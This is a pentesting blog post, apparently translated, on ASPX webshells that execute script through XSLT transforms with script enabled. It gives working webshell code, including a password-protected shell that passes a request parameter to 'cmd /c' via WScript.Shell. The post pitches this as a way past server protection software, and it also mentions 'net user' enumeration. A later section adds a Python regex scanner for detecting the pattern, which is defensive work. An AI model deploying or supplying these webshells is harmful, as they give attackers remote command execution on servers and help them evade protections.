Webshells that use XSL have been posted before; for example, an aspx webshell looks like this:
string xml=@"test";
string xslt=@"
XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""
zcgonvh"">
PublicKeyToken=b77a5c561934e089""/>
PublicKeyToken=b77a5c561934e089""/>
Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
PublicKeyToken=b03f5f7f11d50a3a""/>
";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslCompiledTransform xct=new XslCompiledTransform();
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
xct.Transform(xmldoc,null,new MemoryStream());
%>
The password is a. This webshell can be connected with Caidao (China Chopper). During testing I ran into this situation: the server had protection software such as SafeDog, and the various packets submitted could be intercepted, while all I wanted to do was execute commands. For convenience, I wrote a command-execution webshell that returns output and allows the password to be changed. The code is as follows:
string xml=@"test";
string xslt=@"
var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;
var command = Request.Item['cmd'];
var r = new ActiveXObject(""WScript.Shell"").Exec(""cmd /c ""+command);
var OutStream = r.StdOut;
var Str = """";
while (!OutStream.atEndOfStream) {
Str = Str + OutStream.readAll();
}
Response.Write(""
""+Str+"""");
}]]>
";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XsltSettings xslt_settings = new XsltSettings(false, true);
xslt_settings.EnableScript = true;
try{
XslCompiledTransform xct=new XslCompiledTransform();
xct.Load(xsldoc,xslt_settings,new XmlUrlResolver());
xct.Transform(xmldoc,null,new MemoryStream());
}
catch (Exception e){
Response.Write("Error");
}
%>
The password is cmd and can be changed yourself; the test is shown in the figure below:
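From the defender's side, the telltale of the shell above is an XSLT transform with script enabled (XsltSettings.TrustedXslt, or new XsltSettings(false, true) / EnableScript = true) combined with request input and COM object creation. The following scanner is an added example, not code from the original post; the indicator weights, the flag threshold and the two sample sources are constructed assumptions.

```python
import re

# Indicators of the script-enabled XSLT webshell pattern described above.
# Each entry: (compiled regex, weight, reason). Weights are an assumption.
INDICATORS = [
    (re.compile(r"XsltSettings\.TrustedXslt"), 3,
     "XsltSettings.TrustedXslt turns on script and document() support"),
    (re.compile(r"new\s+XsltSettings\s*\(\s*\w+\s*,\s*true\s*\)"), 3,
     "XsltSettings constructed with enableScript=true"),
    (re.compile(r"\.EnableScript\s*=\s*true"), 3,
     "EnableScript explicitly enabled"),
    (re.compile(r"msxsl:script"), 3, "embedded msxsl:script block"),
    (re.compile(r"WScript\.Shell|ActiveXObject"), 2,
     "COM object creation from script"),
    (re.compile(r"Request(\.Item)?\s*\["), 1,
     "request parameter feeds the transform"),
]
FLAG_THRESHOLD = 5  # assumption: script-enabled XSLT plus any COM/request use


def scan_source(text: str) -> dict:
    """Return score, matched reasons and whether the source should be flagged."""
    score, reasons = 0, []
    for rx, weight, reason in INDICATORS:
        if rx.search(text):
            score += weight
            reasons.append(reason)
    return {"score": score, "reasons": reasons, "flagged": score >= FLAG_THRESHOLD}


# Constructed samples (not real files): one mirrors the settings used in the
# post, the other uses XSLT with script disabled, as a normal report page might.
SUSPICIOUS = """
XsltSettings xslt_settings = new XsltSettings(false, true);
xslt_settings.EnableScript = true;
var command = Request.Item['cmd'];
var r = new ActiveXObject("WScript.Shell");
"""
BENIGN = """
XslCompiledTransform xct = new XslCompiledTransform();
xct.Load("report.xslt", XsltSettings.Default, new XmlUrlResolver());
xct.Transform(doc, null, writer);
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan_source(src))
```

Run it over every .aspx/.ashx/.asax file in the web root; a hit on the script-enabling settings alone is worth a manual look even below the threshold, since legitimate XSLT pages rarely need script.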
Also attached is the command-execution function from a larger webshell (screenshot; form fields: Program = c:\windows\system32\cmd.exe, Arguments = /c net user).
https://github.com/Ridter/Pentest/
Source: Evi1cg's blog